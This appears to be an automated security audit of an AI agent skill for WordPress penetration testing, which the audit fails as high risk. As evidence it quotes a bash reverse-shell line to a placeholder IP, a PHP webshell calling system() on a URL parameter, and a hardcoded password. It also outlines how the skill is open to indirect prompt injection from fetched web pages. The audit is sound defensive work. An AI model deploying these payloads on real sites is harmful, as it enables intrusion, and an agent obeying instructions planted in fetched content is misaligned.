WordPress Penetration Testing

Fail

Audited by Gen Agent Trust Hub on Mar 10, 2026

Risk Level: HIGH
CREDENTIALS_UNSAFE, COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [CREDENTIALS_UNSAFE]: The skill contains hardcoded credentials in its example commands.
      • Evidence: set PASSWORD jessica found in the Metasploit shell upload and plugin exploitation examples.
  • [COMMAND_EXECUTION]: The skill relies extensively on the execution of various command-line tools for security assessment and exploitation.
      • Evidence: Commands using wpscan, nmap, msfconsole, curl, and wget are provided throughout the document to interact with remote systems.
  • [REMOTE_CODE_EXECUTION]: The skill provides methodologies for generating and executing malicious code on remote target servers.
      • Evidence: Instructions for creating a PHP reverse shell (exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");) and a malicious WordPress plugin containing a webshell (system($_GET['cmd']);).
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection through the ingestion of untrusted data from target websites.
      • Ingestion points: The skill uses curl to fetch and display content from target websites (e.g., curl -s http://target.com | grep -i wordpress).
      • Boundary markers: There are no explicit boundary markers or instructions to the agent to ignore potentially malicious instructions embedded in the target's HTML or metadata.
      • Capability inventory: The skill has access to powerful capabilities including network operations (curl, nmap), file writing (cat > malicious.php), and exploitation frameworks (msfconsole).
      • Sanitization: No sanitization or filtering of the fetched web content is performed before it is processed by the agent.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Mar 10, 2026, 01:15 AM